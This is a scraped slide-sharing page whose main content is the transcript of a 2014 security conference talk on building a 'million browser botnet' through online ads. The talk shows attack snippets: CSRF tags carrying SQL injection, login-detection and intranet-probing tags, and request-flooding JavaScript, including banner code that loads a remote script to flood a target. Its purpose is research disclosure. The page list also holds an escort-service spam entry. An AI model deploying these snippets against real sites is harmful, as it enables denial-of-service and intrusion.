3 Reasons You Need Proactive Protection Against Malware3 Reasons You Need Proactive Protection Against Malware
3 Reasons You Need Proactive Protection Against Malware
 
3 Reasons It's Time for a New Remote Access Model
3 Reasons It's Time for a New Remote Access Model3 Reasons It's Time for a New Remote Access Model
3 Reasons It's Time for a New Remote Access Model
 
새로운 원격 접속 모델이 필요한 3가지 이유
새로운 원격 접속 모델이 필요한 3가지 이유새로운 원격 접속 모델이 필요한 3가지 이유
새로운 원격 접속 모델이 필요한 3가지 이유
 
更新遠端存取模式的 3 大理由
更新遠端存取模式的 3 大理由更新遠端存取模式的 3 大理由
更新遠端存取模式的 3 大理由
 
应该采用全新远程访问模式的 3 大原因
应该采用全新远程访问模式的 3 大原因应该采用全新远程访问模式的 3 大原因
应该采用全新远程访问模式的 3 大原因
 
3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと き
3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと き3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと き
3 つの理由 今こそ新しいリモート・アク セス・モデルを採用すべきと き
 
3 razões chegou a hora de um novo modelo de acesso remoto
3 razões chegou a hora de um novo modelo de acesso remoto3 razões chegou a hora de um novo modelo de acesso remoto
3 razões chegou a hora de um novo modelo de acesso remoto
 
3 motivi per cui è necessario un nuovo modello di accesso remoto
3 motivi per cui è necessario un nuovo modello di accesso remoto3 motivi per cui è necessario un nuovo modello di accesso remoto
3 motivi per cui è necessario un nuovo modello di accesso remoto
 
3 raisons de changer votre modèle d'accès à distance
3 raisons de changer votre modèle d'accès à distance3 raisons de changer votre modèle d'accès à distance
3 raisons de changer votre modèle d'accès à distance
 
3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...
3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...
3 motivos por los que ahora es el momento perfecto para adoptar un nuevo mode...
 
3 Gründe für eine neue Art des Remotezugriffs
3 Gründe für eine neue Art des Remotezugriffs3 Gründe für eine neue Art des Remotezugriffs
3 Gründe für eine neue Art des Remotezugriffs
 
Customer Technology Day Chicago 2015
Customer Technology Day Chicago 2015Customer Technology Day Chicago 2015
Customer Technology Day Chicago 2015
 
Edge 2014: MPEG DASH – Tomorrow's Format Today
Edge 2014: MPEG DASH – Tomorrow's Format TodayEdge 2014: MPEG DASH – Tomorrow's Format Today
Edge 2014: MPEG DASH – Tomorrow's Format Today
 
Site Shield Product Brief - Origin defense by cloaking web infrastructure and...
Site Shield Product Brief - Origin defense by cloaking web infrastructure and...Site Shield Product Brief - Origin defense by cloaking web infrastructure and...
Site Shield Product Brief - Origin defense by cloaking web infrastructure and...
 
Prolexic Routed Product Brief - DDoS defense for protecting network and data ...
Prolexic Routed Product Brief - DDoS defense for protecting network and data ...Prolexic Routed Product Brief - DDoS defense for protecting network and data ...
Prolexic Routed Product Brief - DDoS defense for protecting network and data ...
 
Web Application Accelerator Product Brief - Application delivery for global w...
Web Application Accelerator Product Brief - Application delivery for global w...Web Application Accelerator Product Brief - Application delivery for global w...
Web Application Accelerator Product Brief - Application delivery for global w...
 
Alta Product Brief - Cloud-based application delivery platform for web applic...
Alta Product Brief - Cloud-based application delivery platform for web applic...Alta Product Brief - Cloud-based application delivery platform for web applic...
Alta Product Brief - Cloud-based application delivery platform for web applic...
 

Recently uploaded

Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 

Recently uploaded (20)

Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 

WhiteHat Security experts reveal how to build a million browser botnet using online advertising

  • 1.
  • 2. Million Browser Botnet Matt Johansen/Michael Smith
  • 3. ©2014 AKAMAI | FASTER FORWARDTM About WhiteHat Security • Headquartered in Santa Clara, California • WhiteHat Sentinel: SaaS end-to-end website risk management platform (static & dynamic vulnerability assessment) • Employees: 340+
  • 4. ©2014 AKAMAI | FASTER FORWARDTM Bio Matt Johansen BlackHat, DEFCON, RSA Speaker Oversees assessment of 15,000+ websites Background in Penetration Testing Hacker turned Management I'm hiring… a lot…
  • 5. ©2014 AKAMAI | FASTER FORWARDTM When visiting ANY web page… …by nature of the way the Web works, it has near complete control of your Web browser for as long as you are there. Cross-Site Request Forgery (CSRF) Cross-Site Scripting (XSS) Clickjacking … and various other browser tricks
  • 6. ©2014 AKAMAI | FASTER FORWARDTM Overview: HTML / Javascript “malware” • Browser Interrogation • Evil Cross-Site Request Forgery • Login-Detection • Deanonymization • Intranet Hacking • Auto Cross-Site Scripting • Drive-by-Download (Traditional Malware) • [Distributed] Brute-Force Hash Cracking • Application-Level DDoS
  • 7. ©2014 AKAMAI | FASTER FORWARDTM Browser interrogation Auto-relay OS information, system settings, browser version, installed plug-ins, geo-location, etc.
  • 8. ©2014 AKAMAI | FASTER FORWARDTM Evil CSRF (Javascript not necessary) Force a browser to hack ANY other website, upload / download illegal content, search for embarrassing or incriminating terms, initiate bank wire transfers, post offensive messages, vote Edward Snowden as Times Person of the Year. <img src="http://server/cart?id=‘ UNION ALL SELECT user, pass,…”> <img src="http://torrent/D1C16AB1E2330AF3C4BE06AC43ABCE1CBD78C.torrent”> <img src="http://www.google.com/search?q=Justin+Bieber+fan+club”> <img src="http://att/search?uuid=10009”><img src="http://att/search?uuid=10010”> <img src="http://server/vote?id=4”> Spoofing Google search history with CSRF http://jeremiahgrossman.blogspot.com/2010/12/spoofing-google-search-history-with.html
  • 9. ©2014 AKAMAI | FASTER FORWARDTM Login-Detection <img src=”http://site/img.png” onload=”loggedin()” onerror=”notloggedin()” /> <script src=”http://site/javascript.js” onload=”loggedin()” onerror=”notloggedin()”></ script> A least 6 different techniques I Know What Websites You Are Logged-In To http://blog.whitehatsec.com/i-know-what-websites-you-are-logged-in-to-login-detection-via-csrf/
  • 10. ©2014 AKAMAI | FASTER FORWARDTM Deanonymize via mouse-click (clickjack) I Know Your Name, and Probably a Whole Lot More http://blog.whitehatsec.com/i-know-your-name-and-probably-a-whole-lot-more-deanonymization-via-likejacking-followjacking-etc/
  • 11. ©2014 AKAMAI | FASTER FORWARDTM Intranet Hacking <iframe src=”http://192.168.1.1/” onload=”detection()”></iframe> http://www.slideshare.net/jeremiahgrossman/hacking-intranet-websites-from-the-outside
  • 12. ©2014 AKAMAI | FASTER FORWARDTM Auto-XSS <iframe src=“http://server/q=…<inject XSS payload>”></iframe> § Steal Cookies / Session Hijacking § Steal “saved” passwords. § Etc.
  • 13. ©2014 AKAMAI | FASTER FORWARDTM [Distributed] Brute-Force Hash Cracking “During our tests it has been possible to observe password guessing rates of 100,000 MD5 hashes/second in JavaScript.” - Lavakumar Kuppan
  • 14. ©2014 AKAMAI | FASTER FORWARDTM md5-password-cracker.js by Feross Aboukhadijeh http://feross.org/hacks/md5-password-cracker.js/ Ravan http://www.andlabs.org/tools/ravan/ravan.html
  • 15. ©2014 AKAMAI | FASTER FORWARDTM Application-Level DDoS “A browser can send a surprisingly large number of GET requests to a remote website using COR from WebWorkers. During tests it was found that around 10,000 requests/minute can be sent from a single browser.” - Lavakumar Kuppan § Does not hold open [a lot of] TCP connections, just fires a lot HTTP request synchronously. Attacking with HTML5 https://media.blackhat.com/bh-ad-10/Kuppan/Blackhat-AD-2010-Kuppan-Attacking-with-HTML5-wp.pdf
  • 16. ©2014 AKAMAI | FASTER FORWARDTM Connection-Limits (6-per hostname) http://www.browserscope.org/
  • 17. ©2014 AKAMAI | FASTER FORWARDTM Connection-Limit Bypass <script> for (var i = 0; i < 300; i++) { var img = new Image(); var url = ’http://target/?' + i; img.src = url; } </script> DEMO <script> for (var i = 0; i < 300; i++) { var img = new Image(); var url = 'ftp://localhost:80/?' + i; img.src = url; } </script> Apache Killer Limited to 6 connections [~300 connections]
  • 18. ©2014 AKAMAI | FASTER FORWARDTM Benefit of browser hacking this way… • No “malware” to detect, no “exploits,” no zero-days required. • No traces, few alarms. Prevent browser caching. • Everyone’s browser is vulnerable (by default). • Very, very easy. • The web is supposed to work this way.
  • 19. ©2014 AKAMAI | FASTER FORWARDTM Distribution of this type of “Javascript-malware” • A high trafficked website you own (blog, warez, pr0n, etc.) • HTML Injection on popular websites, forums etc. (XSS) • Man-in-the-Middle (WiFi) • [HTML] Email spam • Search Engine Poisoning • Compromise websites (mass SQL injection worms) • Third-Party Web Widgets (Weather, Counters, Trackers, etc.) WE Third-Party Web Widget Security FAQ NEED TO THINK BIGGER! http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html Owning bad guys {and mafia} with javascript botnets http://www.slideshare.net/chemai64/owning-bad-guys-and-mafia-with-javascript-botnets
  • 20. “The most reliable, cost effective method to ©2014 AKAMAI | FASTER FORWARDTM inject evil code is to buy an ad.” -Douglas Crockford
  • 21. Advertisers ©2014 AKAMAI | FASTER FORWARDTM Advertising Networks Blogs News Social Publishers Networks Reviews Visitors
  • 22. ©2014 AKAMAI | FASTER FORWARDTM
  • 23. ©2014 AKAMAI | FASTER FORWARDTM
  • 24. ©2014 AKAMAI | FASTER FORWARDTM
  • 25. ©2014 AKAMAI | FASTER FORWARDTM
  • 26. ©2014 AKAMAI | FASTER FORWARDTM Leverage Advertising Networks to… • Browser Interrogation • Evil Cross-Site Request Forgery • Login-Detection • User Deanonymization • Intranet Hacking • Auto Cross-Site Scripting • Drive-by-Download (Traditional Malware) • [Distributed] Brute-Force Hash Cracking • Application-Level DDoS • Cross-Domain Password Brute-Force
  • 27. Cost-per-Click (CPC) Cost-per-Thousand (CPM) Price Range: $0.01 - $5.00 (USD) Million Browser Botnet @ $0.15 (CPM) = $150 (USD) Million Browser Botnet @ $0.50 (CPM) = $500 (USD) Stolen credit cards anyone? ©2014 AKAMAI | FASTER FORWARDTM
  • 28. ©2014 AKAMAI | FASTER FORWARDTM
  • 29. ©2014 AKAMAI | FASTER FORWARDTM
  • 30. ©2014 AKAMAI | FASTER FORWARDTM
  • 31. ©2014 AKAMAI | FASTER FORWARDTM In side the banner code, we pointed a script tag to: http://ec2-23-20-141-160.compute-1.amazonaws.com/campaign.js for (var i = 0; i < 10000; i++) { var img = new Image(); var url = 'http://<amazon_aws>/iclick/id?' + i; img.src = url; } Then we could change the javascript payload to whatever, whenever, without any approval process.
  • 32. DEMO ©2014 AKAMAI | FASTER FORWARDTM
  • 33. ©2014 AKAMAI | FASTER FORWARDTM
  • 34. ©2014 AKAMAI | FASTER FORWARDTM
  • 35. We’re controlling someone else’s robots! ©2014 AKAMAI | FASTER FORWARDTM
  • 36. ©2014 AKAMAI | FASTER FORWARDTM
  • 37. ©2014 AKAMAI | FASTER FORWARDTM
  • 38. ©2014 AKAMAI | FASTER FORWARDTM
  • 39. ©2014 AKAMAI | FASTER FORWARDTM
  • 40. ©2014 AKAMAI | FASTER FORWARDTM Advertising Network kicks into gear…
  • 41. ©2014 AKAMAI | FASTER FORWARDTM
  • 42. ©2014 AKAMAI | FASTER FORWARDTM
  • 43. ©2014 AKAMAI | FASTER FORWARDTM
  • 44. ©2014 AKAMAI | FASTER FORWARDTM
  • 45. ©2014 AKAMAI | FASTER FORWARDTM
  • 46. ©2014 AKAMAI | FASTER FORWARDTM
  • 47. ©2014 AKAMAI | FASTER FORWARDTM
  • 48. ©2014 AKAMAI | FASTER FORWARDTM
  • 49. ©2014 AKAMAI | FASTER FORWARDTM
  • 50. ©2014 AKAMAI | FASTER FORWARDTM
  • 51. ©2014 AKAMAI | FASTER FORWARDTM
  • 52. ©2014 AKAMAI | FASTER FORWARDTM
  • 53. ©2014 AKAMAI | FASTER FORWARDTM Characteristics of the Million Browser Botnet • Layer 3-4 and 5-7 • Good distribution • Overlap with legitimate users • No spoofed sources • Referrer signature • We didn’t measure the FTP method
  • 54. ©2014 AKAMAI | FASTER FORWARDTM http://www.net-security.org/secworld.php?id=15179
  • 55. “[N]obody's breaking the web, dude. ©2014 AKAMAI | FASTER FORWARDTM Not now, not ever.” Dan Kaminsky to Jeremiah Grossman, December 21, 2010
  • 56. ©2014 AKAMAI | FASTER FORWARDTM Thank you Matt Johansen • Threat Research Center, Manager • Twitter: @mattjay • Email: matt@whitehatsec.com Michael Smith • CSIRT Director • Twitter: @rybolov • Email: mismith@akamai.com